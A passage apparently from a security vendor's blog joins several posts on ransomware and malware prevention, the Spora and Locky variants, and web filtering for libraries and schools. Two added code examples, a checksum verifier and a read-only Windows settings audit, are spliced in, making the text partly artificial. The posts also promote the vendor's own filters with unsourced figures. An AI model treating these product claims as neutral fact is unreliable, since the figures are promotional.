The ransom payment may be avoided, but removing the infection will still result in considerable costs being incurred. Then there is the impact the attack has had on patrons of the city’s libraries. The library system is primarily used by poor and disadvantaged individuals. According to library spokesperson Jen Hatton, “For many of our patrons, we’re their only access to the internet.” Hatton also said, “This is their only access to a computer. Some of them have a smartphone, but they don’t have a data plan. They come in and use the Wi-Fi.”
It is not clear how the infection occurred, although there are two main ways that ransomware is installed: Malicious spam email messages and by visiting malicious websites. Both of these attack vectors can be blocked if appropriate software is installed.
Web Filters in Libraries are an Important Ransomware Defense
A spam filter can be used to filter out malicious messages. Those messages contain attachments, which if opened, infect computers or download ransomware. User interaction is required. If the messages are quarantined and not delivered to users’ inboxes, infection can be prevented.
The use of web filters in libraries is therefore not just about limiting access to inappropriate and harmful website content. Web filters in libraries are an important cybersecurity protection that can help to ensure that, come what may, patrons will still be able to access the Internet and borrow books.
If you use a computer, you are at risk of having your device infected with malware; however, listed below are some useful tips for preventing malware infections.
Unfortunately, signature-based anti-malware software is far less effective at preventing infections than in years gone by. Malware developers are now using a wide range of strategies and techniques to prevent traditional anti-malware solutions from detecting and blocking infections.
Rely on anti-malware or anti-virus software alone and sooner or later you may find your device has been compromised, your keystrokes are being logged, and your – or your organization’s – data are being stolen.
However, there are some straightforward strategies that you can adopt to prevent malware infections and keep your computer, and your network, malware-free.
10 Tips for Preventing Malware Infections
Backup Your data
OK, a data backup will not prevent a malware infection, but it can help you recover if your computer is infected with ransomware or if your data are corrupted as a result of an infection – or removal of malware. The only way to recover from some infections is to wipe out your system and restore it from a previously known safe point. You must therefore have a safe point that you can use. Nightly backups should be performed. You only then stand to lose 24 hours of data at most.
Keep your malware definitions up to date
Anti-malware software may not be as effective as it once was, but you do need to give it a fighting chance. If you do not keep your definitions 100% up to date you are asking for trouble. This may sound obvious, but many organizations delay updating malware definitions or forget to set software to update automatically on all devices.
Never click on links or open email attachments from unknown senders
Cybercriminals target employees as it is far easier to gain access to a corporate network if an employee bypasses their organization’s defences and installs malware. All it takes is for one employee to install malware for attackers to gain a foothold in a network. Ensure that all employees receive anti-phishing training and have at least basic IT security skills. Most data breaches start with a phishing email.
Ensure operating systems and software are patched promptly
Operating systems, firmware, and all software must be kept up to date. As soon as patches are released, cybercriminals will be reverse engineering them to uncover the vulnerabilities. Don’t delay applying patches. Good patch management policies are essential for preventing malware infections.
Watch out for shadow IT
Downloading pirated software is an excellent way to infect computers with malware. Pirated software is often bundled with malware, spyware, and all manner of nasties. Block the running of executables and keygens if practical. Only install software from trusted sources. As an additional check, before installing software, check the software provider’s MD5 hash against your copy. If it’s a match, install. If not, delete.
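The hash check in the tip above, as an added example that is not code from the article or from TitanHQ. It assumes the vendor publishes digests in the coreutils md5sum/sha256sum line format ("<hex digest>  <filename>", with "*" marking binary mode); the sample files and checksum text are constructed in memory. MD5, which the article mentions, is collision-prone, so the example picks the algorithm from the digest length and a vendor-published SHA-256 should be preferred where offered.

```python
"""Verify downloaded installers against vendor-published checksums before installing."""
import hashlib
import hmac
import os
import tempfile

# Hex digest length -> hashlib algorithm. SHA-256 is preferred; MD5 is kept only
# because many vendors (as the article notes) still publish MD5 sums.
_ALGORITHM_BY_LENGTH = {32: "md5", 40: "sha1", 64: "sha256"}


def parse_checksum_file(text):
    """Return {filename: hex digest} from md5sum/sha256sum-style lines.
    Blank lines and '#' comments are skipped; a leading '*' (binary-mode marker) is dropped."""
    entries = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        digest, sep, rest = line.partition(" ")
        name = rest.lstrip(" ").lstrip("*")
        if not sep or not name:
            raise ValueError(f"malformed checksum line: {line!r}")
        entries[name] = digest.lower()
    return entries


def file_digest(path, algorithm):
    """Hash a file in 1 MiB chunks so large installers need not fit in memory."""
    h = hashlib.new(algorithm)
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 20), b""):
            h.update(chunk)
    return h.hexdigest()


def verify_downloads(directory, checksum_text):
    """Compare each file named in the checksum text with the copy on disk.
    Returns {filename: 'ok' | 'MISMATCH' | 'missing'}; MISMATCH means delete, do not install."""
    report = {}
    for name, expected in parse_checksum_file(checksum_text).items():
        path = os.path.join(directory, name)
        if not os.path.isfile(path):
            report[name] = "missing"
            continue
        algorithm = _ALGORITHM_BY_LENGTH.get(len(expected))
        if algorithm is None:
            raise ValueError(f"unrecognised digest length for {name}: {len(expected)}")
        actual = file_digest(path, algorithm)
        # Constant-time comparison of the hex strings.
        report[name] = "ok" if hmac.compare_digest(actual, expected) else "MISMATCH"
    return report


def demo_verification():
    """Constructed scenario: one intact download, one altered in transit, and one
    listed file that was never downloaded. Returns the verification report."""
    genuine = b"abc"  # stands in for the vendor's installer bytes
    altered = b"abd"  # same length, one byte changed
    with tempfile.TemporaryDirectory() as d:
        with open(os.path.join(d, "setup.exe"), "wb") as f:
            f.write(genuine)
        with open(os.path.join(d, "plugin.msi"), "wb") as f:
            f.write(altered)
        # The published sums (constructed) are computed over the genuine bytes.
        published = "\n".join([
            "# constructed SHA256SUMS",
            f"{hashlib.sha256(genuine).hexdigest()}  setup.exe",
            f"{hashlib.sha256(genuine).hexdigest()} *plugin.msi",
            f"{hashlib.sha256(genuine).hexdigest()}  readme.txt",
        ])
        return verify_downloads(d, published)


if __name__ == "__main__":
    for name, status in demo_verification().items():
        print(f"{name:12} {status}")
```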
Take care with USB drives
Not all malware comes via the web or email. USB drives can easily introduce malware. Make sure your anti-malware solution is configured to automatically scan USB drives before granting system access and never plug in a drive from an unknown source.
Perform regular malware scans
Having anti-virus and anti-malware software will not necessarily mean your system is protected. Full system scans should still be performed. Some infections can slip under the radar. A full scan should be performed at least once a month.
Keep abreast of the latest malware trends
You may have limited time, but it is important to keep abreast of the latest attack trends, cyberattacks, data breaches, and threat reports. Check the warnings from US-CERT, and monitor websites such as DarkReading, CIO, CISO, and The Register. A little research goes a very long way.
Keep mobile devices protected
Mobiles can easily be used to introduce malware onto networks to which they connect. Mobiles are often used on unprotected Wi-Fi hotspots, and the devices are increasingly being targeted by hackers. Ensure security software is installed on mobile devices and security settings on phones are active.
Use a firewall, web, and Wi-Fi filtering
A firewall is an essential tool for preventing malware infections, although businesses should consider purchasing a next generation firewall device. Next generation firewalls combine a traditional firewall with other network device filtering functionalities. Web and Wi-Fi filtering solutions are also important. By filtering the Internet, it is possible to prevent drive-by malware downloads and carefully control the risks that employees take.
There is now a new and particularly dangerous ransomware threat to deal with. Spora ransomware could well be the new Locky.
Locky and Samas ransomware have proved to be major headaches for IT departments. Both forms of ransomware have a host of innovative features designed to avoid detection, increase infections, and inflict maximum damage, leaving businesses with little alternative but pay the ransom demand.
However, there is now a new ransomware threat to deal with, and it could well be even bigger than Locky and Samas. Fortunately, the ransomware authors only appear to be targeting Russian users, but that is likely to change. While a Russian version has been used in attacks so far, an English language version has now been developed. Spora ransomware attacks will soon be a global problem.
A considerable amount of time and effort has gone into producing this particularly dangerous new ransomware variant and a decryptor is unlikely to be developed due to the way that the ransomware encrypts data.
In contrast to many new ransomware threats that rely on a Command and Control server to receive instructions, Spora ransomware is capable of encrypting files even if the user is offline. Shutting down Internet access will not prevent an infection. It is also not possible to block access to the C&C server to stop infection.
Ransomware variants that can encrypt without C&C communication have been developed before, but those variants did not use unique decryption keys, so one key unlocks all infections. Spora ransomware, on the other hand, requires each victim to use a unique key to unlock the encryption. A hard-coded RSA public key is used to generate a unique AES key for every user, and that process occurs locally. The AES key is then used to encrypt the private key from a public/private RSA key pair generated for each victim, again without C&C communications. The RSA key also encrypts the unique AES key for each user. Without the key supplied by the attackers, it is not possible to unlock the encryption.
This complex encryption process is only part of what makes Spora ransomware unique. In contrast to many other ransomware variants, the attackers have not set the ransom amount. This gives the attackers a degree of flexibility and importantly this process occurs automatically. Security researchers believe the degree of automation will see the ransomware offered on an affiliate model.
The flexibility allows businesses to be charged a different amount to an individual. The ransom is set based on the extent of the infection and the types of files that have been encrypted. Since Spora ransomware collects data on the user, amounts can easily be adjusted when contact is made to pay the ransom.
When victims visit the attacker’s payment portal to pay the ransom, they must supply the key file that is created by the ransomware. The key file contains a range of data on the user, including details of the campaign used. The attackers can therefore carefully monitor infections and campaigns. Those campaigns that are effective and result in more payments can then be repeated. Less effective campaigns can be dropped.
Currently there are multiple payment options, including something quite different. Victims can pay to unlock the encryption, or pay extra to prevent future attacks, essentially being granted immunity.
Emsisoft researchers who have analyzed Spora ransomware say it is far from a run-of-the-mill variant that has been quickly thrown together. It is the work of a highly professional gang. The encryption process contains no flaws – uncommon for a new ransomware variant – the design of the HTML ransom demand and the payment portal is highly professional, and the payment portal also contains a chat option to allow communication with the attackers. This degree of professionalism only comes from extensive investment and considerable work. This threat is unlikely to go away soon. In fact, it could prove to be one of the biggest threats in 2017 and beyond.
Cybercriminals have embraced ransomware and have been increasingly targeting businesses, yet many business leaders are unsure how to prevent ransomware attacks. Consequently, the risk from ransomware is not being effectively managed, and that may prove costly.
Ransomware is a form of malware that is capable of encrypting files on local machines, network drives, and servers. Any computer that is connected to the Internet can potentially be infected. Even without internet access, files may be encrypted if a computer is networked. The latest ransomware variants are capable of spreading laterally within a network and encrypting the data on hundreds of devices.
Files required for critical business processes may be encrypted and made inaccessible. A successful attack can result in a company’s operations grinding to a halt. A healthcare ransomware attack can result in patients’ health information becoming inaccessible. An attack on a pharmaceutical company may result in files necessary for drug manufacture being locked, which could affect the quality of products. Lawyers’ offices may lose essential client information. Few businesses could continue to operate at their full potential during a ransomware attack.
The loss of files can prove extremely expensive, far exceeding the cost of any ransom payment. Many companies are therefore left with little alternative but to pay the ransom demand. Ransom payments are actually made surprisingly frequently. According to a recent study conducted by IBM, 70% of businesses that experienced a ransomware infection ended up paying the attackers to supply the keys to unlock their data. Half of those businesses paid more than $20,000 while 20% paid more than $40,000.
Even when the ransom is paid there is no guarantee that a viable key will be supplied to unlock the encryption. Files may therefore be lost forever. One healthcare organization in the United States recently discovered that files can all too easily be lost forever. Three months after ransomware was installed on one of its servers and critical patient health information was encrypted, Desert Care Family and Sports Medicine has still not been able to unlock the encryption nor access its patients’ data.
It is essential to learn how to prevent ransomware attacks and to implement appropriate defenses not only to stop attackers from installing ransomware, but to ensure a system is put in place that will allow data to be recovered without having to resort to paying a ransom.
Recovering from a ransomware attack can be extremely expensive. Ransom payments can be extortionate. Business can be lost while systems are taken out of action. Even applying keys that have been supplied by attackers can be long-winded. Each encrypted device has its own key, and those keys must be applied very carefully. A forensic analysis is also important after a ransomware attack to search for backdoors that may have been added, as well as to determine if data have been stolen. Additional protections then need to be put in place to prevent future attacks from occurring.
How to Prevent Ransomware Attacks
The first and most important step to take will not prevent ransomware attacks, but it will help you to recover from a ransomware attack promptly without having to resort to paying the ransom. Recovery will depend on you having a viable backup of your data. Total file recovery may not be possible, but it should be possible to recover the vast majority of your files.
For that to be possible, you must ensure that all files on all devices and network drives are backed up. That includes all removable drives such as flash drives. Backup files must be stored on a non-networked drive, in the cloud, or ideally on an air-gapped device – one that is unplugged as soon as the backup is performed. Multiple backups should ideally be made, with one copy stored in the cloud and one on a detachable storage device. You should always store backups in multiple files. If one becomes corrupted, you will not lose all of your data.
- Avoid the use of administrator accounts with extensive privileges as far as is possible. If an administrator account is required, use it and then change to a guest account with limited privileges. This will reduce the damage caused if the user’s machine is infected.
- Ensure that all software is kept up to date and your organization employs good patch management practices. In particular, ensure browser and plugin updates are applied promptly. Vulnerabilities can all too easily be exploited and used to download ransomware.
- If plugins are not required, remove them. This applies to Adobe Flash in particular, but also to Java and Silverlight. If they are required, set them to require manual activation individually as and when needed.
- Ensure employees’ computers are configured to show file extensions. If full file extensions are displayed, it is easier to identify potentially malicious files with double extensions.
- Ensure macros are disabled on all devices. At the very least, ensure macros do not run automatically.
- Disable Remote Desktop Protocol (RDP) on all devices unless it is absolutely essential.
- A web filter can be used to prevent end users from visiting malicious websites where ransomware can be downloaded. A web filter can also block malicious third-party adverts (malvertising).
- End users should be instructed never to open files from unknown senders or to click on links contained in emails unless 100% sure that the links are genuine.
- The use of a spam filter is strongly advisable. The spam filter should be configured to aggressively block threats. Executable file attachments should also be automatically quarantined.
In the past few days, Facebook Messenger Locky ransomware attacks have been discovered, exploit activity has increased, and malicious spam email volume has increased. Organizations now need to defend against a wide range of attack vectors.
2016 – The Year of Ransomware
2016 has seen an explosion in the use of ransomware by cybercriminals and there is no sign of that changing in the near future. More than 200 ransomware families have now been identified, one of the most dangerous being Locky.
Locky ransomware was first discovered in February this year, but it has fast become one of the most prolific ransomware variants and has infected thousands of computers. No organization is immune to attack, although the gang behind the infections have been extensively targeting healthcare organizations. A number of U.S. healthcare providers have been forced to pay a ransom demand to recover their data.
Rather than cybercriminals having to break through company defenses to gain access to data, then exfiltrate files, and sell those data on the black market – a process that can take weeks before payment is received – ransomware is a quick and easy revenue generator. Payments are made within a few days of infection as many companies cannot continue to function without access to their data.
It is not even necessary for cybercriminals to develop their own ransomware. The malicious file-encrypting software can be ‘hired’ from the authors. By using ransomware-as-a-service, anyone with an Internet connection could run a ransomware campaign. Little skill is needed and attacks result in fast payment. It is therefore no surprise that the file-encrypting software has become so popular.
Infection can occur via malicious adverts, exploit kits, or via spam email. All of those infection vectors allow the attackers to bypass traditional cybersecurity defenses such as firewalls.
Some headway has been made by security researchers and decryptors have been developed for some ransomware variants. Wildfire, Chimera, Shade, TeslaCrypt, and CoinVault have all been cracked. However, Locky has so far resisted security researchers’ efforts to crack it.
The authors of the crypto-ransomware are also constantly updating Locky and new variants are regularly being released. At present, there is no decryptor available for Locky infections and victims are faced with three choices if they experience an infection:
- Accept data loss
- Pay the ransom demand to obtain a key to unlock data
- Recover encrypted files from backups
Unfortunately for the victims, recovering encrypted files from backups can be complicated. Locky not only locks files with powerful encryption, the file names and file extensions are also changed. This makes it hard for victims to identify specific files. Locky also deletes Windows Shadow Copies to make it harder for victims to recover their data.
Facebook Messenger Locky Ransomware Attacks Reported
The authors behind Locky have experimented with exploit kits to spread infections, although since the demise of the Angler and Neutrino exploit kits, Locky has primarily been distributed via spam email. Massive spam email campaigns are used to spread the malicious software. Those campaigns involve many millions of emails.
However, earlier this month, security researchers noticed that the cybercriminal gang behind Locky has started to use exploit kits again. The Bizarro Sundown exploit kit has been discovered to be spreading Locky. More worrying, Facebook Messenger Locky ransomware attacks have now been reported.
The social media giant has confirmed that Facebook Messenger Locky ransomware attacks have occurred, although Facebook was quick to point out that infections are occurring via “a poorly implemented extension for Google’s Chrome browser.”
Security controls are generally very good at Facebook, but they are not infallible. Facebook Messenger Locky ransomware attacks are a major risk and users must exercise caution.
As with spam email, users should not open any attachments from individuals they do not know. Even when image files and other file types are received via messenger apps and spam email from individuals that are known to the recipient, they should be treated with suspicion.
How to Reduce the Risk of a Ransomware Infection
Businesses need to implement defenses to reduce the risk of a ransomware infection. The consequences for taking no action can be severe.
Ransomware infections can spread laterally through a network and ransomware gangs require payment for each infected machine and can even set the price per infected organization. The Locky ransomware attack on Hollywood Presbyterian Medical Center in February resulted in a ransom payment of $17,000 being made, in addition to the considerable cost associated with removing the infection and recovering from more than a week without access to key information systems.
One of the best defenses against ransomware is WebTitan. WebTitan is an innovative web filtering solution that can be configured to limit access to websites known to host exploit kits. Malicious third-party adverts (malvertising) can be blocked, along with websites that carry a high risk of being exploited by hackers to spread infections.
The best way for businesses to ensure that Facebook Messenger Locky ransomware attacks do not occur is to block Facebook Messenger entirely. With WebTitan, blocking Facebook Messenger – without blocking the Facebook website – is a quick and easy task.
By limiting the websites that can be visited by employees and blocking Facebook Messenger and other chat platforms, organizations can greatly improve their security posture and prevent ransomware from being installed.
For further information on the full range of features of WebTitan, details of pricing, and how to register for a free no-obligation trial, contact the TitanHQ sales team today.
Hardware-based web filtering appliances for schools have some advantages, but many K12 schools are saying goodbye to the appliances and are choosing a much more convenient and practical solution.
In the United States, K12 schools are required to implement a web filtering solution to control access to the Internet in order to receive E-rate funding. Even schools that do not participate in the E-rate program need to filter the Internet. Parents are pressuring schools into ensuring the Internet can be accessed safely in schools and want to receive assurances that their children can use the Internet without inadvertently – or deliberately – viewing inappropriate material such as pornography.
Hardware-Based Web Filtering Appliances for Schools
A hardware-based web filtering appliance for schools may appear to tick all the boxes. Hardware devices sit in front of an Internet gateway and filter Internet traffic. They prevent users from accessing websites that are deemed to be dangerous or inappropriate.
While hardware-based web filtering appliances for schools can seem like an easy option, many schools are finding that is far from the case. Hardware-based web filtering appliances for schools are fine if there are just a handful of computers accessing the Internet in each classroom, but hardware solutions lack scalability. When the number of devices is increased, more appliances must be purchased.
Hardware-based web filtering appliances place limitations on web traffic. When the number of devices simultaneously requiring access to the Internet increases, a bottleneck can occur. It doesn’t matter how much the Internet pipe to a school is increased with an ISP: if a 1GB web filtering appliance is used, for example, that will be the limiting factor, not a 5GB connection. There is likely to be latency, which can be considerable.
One solution is to use multiple hardware devices. This will increase the capacity, although more devices mean an increased maintenance burden on IT departments. Multiple devices mean schools have to find the space to house the appliances. Cooling systems may need to be augmented and more devices means higher energy bills. Hardware-based web filtering appliances for schools can prove to be very costly.
Hardware-based web filtering appliances are now being stretched further still as many schools start increasing the number of devices used by students. While one or two desktop computers used to be sufficient, many schools are now considering one-to-one computing, where each student is issued with a school laptop. However, such an increase in devices places considerable demands on hardware-based web filters and the result is considerable latency.
Then there is the problem of how to protect students when laptop computers are taken home. As we have already seen, some parents have made their schools take back the devices until adequate controls are placed on the devices to restrict Internet content. If software is installed on each laptop – in the form of a local client – the Internet can still be filtered using school hardware-based web filters. The client forwards traffic to the school’s datacenter, and traffic then passes through a web filtering appliance.
This sorts out the problem of Internet filtering, but it also puts more pressure on the datacenter. This may even require additional hardware devices to be purchased. Also, outside of normal school hours, if there are any issues with the datacenter, students will be prevented from accessing the Internet.
The latency and cost issues have spurred many K12 schools to look for an alternative to hardware-based web filtering appliances for schools. The answer has been found in the cloud.
Benefits of Cloud-Based Web Filtering Solutions for Schools
Cloud-based web filtering solutions offer a number of advantages over hardware-based web filtering appliances and solve many problems, especially as schools increase either the number of devices supplied to students or the number of devices that are allowed to connect to the network.
Cloud-based solutions require no hardware purchases and no space in the data center. This offers an initial cost saving as devices do not need to be purchased. No network deployments of client applications also means quick and easy implementation and since there is no hardware to maintain, the burden on IT departments is eased.
Any web filtering solution involves a certain degree of latency, although with cloud-based solutions this is kept to an absolute minimal level. Internet speed is not noticeably reduced and there is no latency within the datacenter itself. When students take hardware off the premises they can still be protected without data needing to be routed back to the schools’ datacenter.
Then there is the speed of reaction to web content that should be blocked. When changes need to be made to filtering rules they can be applied quickly and easily from any location without the need for IT staff to access each hardware appliance. A cloud-based control panel can be accessed from anywhere with an Internet connection and changes can be rapidly made.
Cloud-based solutions are also highly scalable. There is no limit on bandwidth or the number of users. Once a solution is deployed, it doesn’t matter how big the network gets. There is no need to upgrade hardware or purchase any more devices.
With these and many other benefits it is no surprise that so many schools are now turning to the cloud for their Internet filtering needs. The cloud is the perfect choice for K12 schools looking to keep their students – and devices – safe.
There are a number of reasons why ransomware attacks have been increasing and why the crypto-ransomware has now become one of the biggest and most worrying threats. However, the main reason is ransomware is extremely profitable.
How profitable? According to a recent security report from McAfee Labs, one single ransomware author managed to pull in an incredible $121 million in ransomware payments in the first six months of 2016. Take off the expenses incurred and the author cleared $94 million in profit.
That was just one author. There are many. There are now more than 200 different ransomware families and many more variants of each. Fortunately, developing new ransomware is a complicated business that requires considerable programming skill. Unfortunately, there are many individuals who rent ransomware to conduct campaigns and take a cut of the profits.
The explosion in use of ransomware in the past two years is a cause for concern for all Internet users, especially for business owners. Unfortunately, the ransomware crisis is unlikely to be resolved any time soon. As long as it is profitable, the attacks will continue. Vincent Weafer, VP of Intel Security’s McAfee Labs, expects the revenues from ransomware infections in 2016 will be of the order of several hundreds of millions of dollars and most likely considerably more.
McAfee recorded 1.3 million new ransomware samples in the first half of 2016. The risk of infection with ransomware has increased as authors employ increasingly sophisticated methods of evading detection. Ransomware is also spreading faster and encrypting even more data to ensure victims have no alternative but to pay up.
But how is it possible to prevent ransomware attacks? Unfortunately, there is no silver bullet. Prevention requires several different strategies to be adopted. To prevent ransomware attacks, check out the ransomware protection tips below.
Ransomware Protection Tips
We have listed some ransomware protection tips below that will help you to avoid ransomware infections – And how to avoid paying a ransom should the unthinkable happen.
The first rule of ransomware avoidance is backing up your data
The No More Ransom Project is a great initiative. When ransomware variants are cracked and decryptors developed, they are uploaded onto the No More Ransom site. Victims can then decrypt their files for free. However, there are more than 200 ransomware families and fewer than 10 free decryptors. You don’t need to have majored in mathematics to work out that the probability of a decryptor being available is rather small. If you want to be able to avoid paying a ransom you must have a viable backup of your data.
The second rule of ransomware avoidance is backing up your data
Without a backup, you will need to pay the ransom if you want your data back. You therefore need to make sure you have a viable backup file. However, multiple backups should be performed. You should have a backup on an external hard drive and a second backup in the cloud. Your external drive must also be disconnected once the backup has been performed.
Keep software up to date
Vulnerabilities are constantly being discovered and patches issued to plug security holes. Even if exploits have not been developed to take advantage of those vulnerabilities, patches can be reverse engineered. Once patches are released, it will only be a matter of time before exploits are developed. It is therefore essential to apply patches and install software updates promptly. Patches should be prioritized with critical updates applied first.
Remove unnecessary software and browser plugins
If you have browser plugins installed that you never use, remove them. They are an unnecessary risk. Of particular concern are Adobe Flash, Java, and Silverlight. Vulnerabilities are regularly discovered in these plugins and for many businesses they are surplus to requirements. Remove them or at least set them to require manual activation.
Malvertising may not be the most common method of ransomware delivery but the risk should be mitigated nonetheless. Businesses should use an adblocker to prevent malicious adverts from being displayed. Do your employees need to see web adverts? If not, why take the risk?
Filter the Internet
Malicious websites containing exploit kits can probe for a wide range of security vulnerabilities and leverage these to silently download ransomware. WebTitan can be configured to block websites known to contain malware and block sites by category. Categories of websites known to be ‘high risk’ can be blocked, as well as sites that have no work-purpose. Blocking access to certain categories of websites can greatly reduce the risk from web-borne ransomware and malware infections.
Conduct security awareness training
Security awareness training is not just for employees. All individuals in an organization should be taught the security basics from the CEO down. Training should include phishing awareness and avoidance, ransomware and malware, and good security best practices such as never opening emails from unknown sources, not enabling macros, and avoiding clicking links in spam and suspicious emails.
Turn off macros
Macros are used in many organizations, but not by the majority of employees. Macros should be disabled on all devices unless essential, and even then, macros should be enabled manually on documents and spreadsheets if required.
Employ a robust spam filtering solution
A paid-for spam filtering solution should be installed to catch spam emails and prevent delivery. Email is one of the most commonly used ransomware delivery mechanisms. Anti-spam solutions such as SpamTitan can greatly reduce the probability of employees’ security training being put to the test.
Use anti-malware and anti-virus solutions
Employ anti-malware and anti-virus solutions that include a real-time scanning feature and set the solutions to update virus/malware definitions automatically. Full system scans should also be periodically conducted.
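The configuration checks in the two prevention lists above (admin accounts, visible file extensions, macros, RDP, the Flash/Java/Silverlight plugins, real-time anti-malware) can be audited on a Windows endpoint with the script below. It is an added example, not TitanHQ code, and it is read-only: it reports each control's state and changes nothing. The registry locations are standard Windows and Office keys; the Office version list, the plugin name patterns and the use of the Windows Defender cmdlet are assumptions for this example.

```powershell
# Added audit script (not from the original page); read-only, reports only.
# Assumptions: Office 2010/2013/2016+ registry versions, Windows Defender as the AV.

function Get-RegValue {
    param([string]$Path, [string]$Name)
    try { (Get-ItemProperty -Path $Path -Name $Name -ErrorAction Stop).$Name }
    catch { $null }   # key or value absent
}

function New-Finding {
    param([string]$Control, [bool]$Pass, [string]$Detail)
    [pscustomobject]@{
        Control = $Control
        Status  = $(if ($Pass) { 'OK' } else { 'REVIEW' })
        Detail  = $Detail
    }
}

function Test-RansomwareControls {
    $findings = @()

    # 1. Day-to-day work should not run under an administrator account.
    $identity  = [Security.Principal.WindowsIdentity]::GetCurrent()
    $principal = [Security.Principal.WindowsPrincipal]$identity
    $isAdmin   = $principal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)
    $findings += New-Finding 'Non-admin account in use' (-not $isAdmin) "Current user: $($identity.Name)"

    # 2. Explorer shows extensions, so a double-extension file is not displayed as 'invoice.pdf'.
    $hideExt = Get-RegValue 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced' 'HideFileExt'
    $findings += New-Finding 'File extensions visible' ($hideExt -eq 0) "HideFileExt = $hideExt (0 = shown)"

    # 3. Office macro setting (VBAWarnings): 4 = disabled without notification, 3 = signed only,
    #    2 = disabled with notification (user can still click Enable), 1 = all macros run.
    #    Group Policy keys override the per-user keys, so both locations are checked.
    foreach ($ver in '16.0', '15.0', '14.0') {          # assumed Office versions
        foreach ($app in 'Word', 'Excel', 'PowerPoint') {
            $policy = Get-RegValue "HKCU:\Software\Policies\Microsoft\Office\$ver\$app\Security" 'VBAWarnings'
            $user   = Get-RegValue "HKCU:\Software\Microsoft\Office\$ver\$app\Security" 'VBAWarnings'
            $value  = if ($null -ne $policy) { $policy } else { $user }
            if ($null -eq $value) { continue }          # app/version not present or never configured
            $source = if ($null -ne $policy) { 'policy' } else { 'user' }
            $findings += New-Finding "Macros restricted ($app $ver)" ($value -ge 3) "VBAWarnings = $value ($source)"
        }
    }

    # 4. Remote Desktop disabled unless essential (fDenyTSConnections = 1 means disabled).
    $denyRdp = Get-RegValue 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server' 'fDenyTSConnections'
    $findings += New-Finding 'RDP disabled' ($denyRdp -eq 1) "fDenyTSConnections = $denyRdp"

    # 5. Plugins singled out above: Flash, Java and Silverlight should be gone if unused.
    $uninstallKeys = 'HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\*',
                     'HKLM:\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*'
    $plugins = Get-ItemProperty -Path $uninstallKeys -ErrorAction SilentlyContinue |
        Where-Object { $_.DisplayName -match 'Adobe Flash Player|^Java \d|Silverlight' } |   # assumed name patterns
        Select-Object -ExpandProperty DisplayName -Unique
    $pluginDetail = if ($plugins) { "Installed: $($plugins -join ', ')" } else { 'None of Flash/Java/Silverlight found' }
    $findings += New-Finding 'Risky plugins absent' (-not $plugins) $pluginDetail

    # 6. Real-time scanning with current definitions (Windows Defender cmdlet; other AV
    #    products need their own query, so the check falls back to a REVIEW finding).
    try {
        $mp  = Get-MpComputerStatus -ErrorAction Stop
        $age = (Get-Date) - $mp.AntivirusSignatureLastUpdated
        $findings += New-Finding 'Real-time protection on' $mp.RealTimeProtectionEnabled `
            "Signatures updated $([int]$age.TotalDays) day(s) ago"
    } catch {
        $findings += New-Finding 'Real-time protection on' $false 'Get-MpComputerStatus unavailable; check the AV console'
    }

    return $findings
}

Test-RansomwareControls | Format-Table -AutoSize
```

Run it in the context of the user whose settings you want to inspect, since the Explorer and Office values live under HKCU; any row marked REVIEW maps back to one of the list items above.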
The threat from malware is now greater than ever before in the history of the Internet. New malware is being developed at alarming rates, and traditional antivirus software developers are struggling to maintain pace and prevent new forms of malware from being installed on endpoints.
Not only are malware developers creating ever stealthier information stealers, Trojans, and ransomware, the methods used to install the malicious software are becoming much more sophisticated. Keeping endpoints and networks free from infection is becoming far more complicated, while the cost of dealing with malware infections is increasing. Figures from the Ponemon Institute suggest the average cost of a data breach has now reached $4 million.
2015 saw some of the largest data breaches ever discovered and the situation is getting worse. The 78.8-million record attack on Anthem Inc. may have been one of the worst ever data breaches in terms of the number of individuals affected and the amount of data obtained by the attackers, but 2016 has seen even larger data breaches uncovered.
The attack on LinkedIn, which was discovered in May this year, affected 117 million users. The data breach at MySpace resulted in 460 million passwords being obtained by hackers, 111 million of those records also included a username. However, even those massive data breaches were dwarfed by the discovery of the data breach at Yahoo Inc., this month. Hackers were found to have obtained the information of around 500 million individuals.
Not all of those data breaches involved the use of malware, but a large percentage of smaller breaches have occurred as a result of malware infections and the threat from ransomware has grown significantly over the past few months.
Threat from Malware Greater than Ever Before
This month, a study conducted by Proofpoint has cast more light on the seriousness of the threat from malware and the extent to which organizations are being attacked. The Proofpoint 2016 Security Report shows that throughout 2015, an average of 274 new forms of previously unknown malware were discovered every minute. 971 forms of unknown malware hit organizations every hour in 2015. That’s 9 times the downloads that occurred in 2014. Proofpoint’s research indicates 12 million new pieces of malware were discovered every month last year.
Proofpoint’s study revealed that in 2015, 89% of organizations downloaded a malicious file. In 2014, only 63% of companies reported downloading malicious files. In 2014, malware was downloaded every 6 minutes on average. In 2015, new malware was being downloaded every 81 seconds. In total, almost 144 million new malware were found in 2015. Out of the 6,000 gateways analyzed by Proofpoint, 52.7% were found to have downloaded at least one file infected with malware, and an average of 2,372 infected files were reported per gateway.
Email remains one of the most common vectors for malware delivery. Attackers are sending malicious emails containing scripts that download malware, or links to websites containing exploit kits that download information stealers, Trojans, and ransomware.
There was a small decline in the number of malicious websites that were accessed by employees. In 2014, 86% of organizations reported that end users had visited malicious websites. In 2015, 82% of organizations said employees had visited malicious websites.
However, employees in enterprise organizations were five times more likely to visit malicious websites in 2015 than in 2014. On average, enterprise employees visited malicious websites every 5 seconds. In 2014, malicious websites were accessed every 24 seconds.
Protecting Against Malware Attacks
Defending against malware attacks requires more than an anti-virus or anti-malware solution. Multi-layered cybersecurity defenses are required to cope with the onslaught.
Training programs should be conducted regularly to ensure employees are aware of the risks and latest threats. Knowledge should also be put to the test by conducting phishing training exercises.
Technical solutions should include anti-virus, anti-malware, and anti-bot software. Virus and malware definitions must be kept up to date and regular network scans conducted to identify infections rapidly.
Since email is the most common attack vector, anti-spam solutions should be employed. By using a robust anti-spam solution such as SpamTitan it is possible to prevent the vast majority of malicious emails from being delivered to end users. SpamTitan blocks 99.7% of spam email.
A URL filtering solution such as WebTitan should also be employed to prevent end users from visiting malicious websites and downloading malware. WebTitan can be configured to prevent end users from visiting websites known to contain malware and exploit kits. Malicious third party adverts – malvertising – can also be blocked, as can categories of websites which carry a high risk of containing malware.
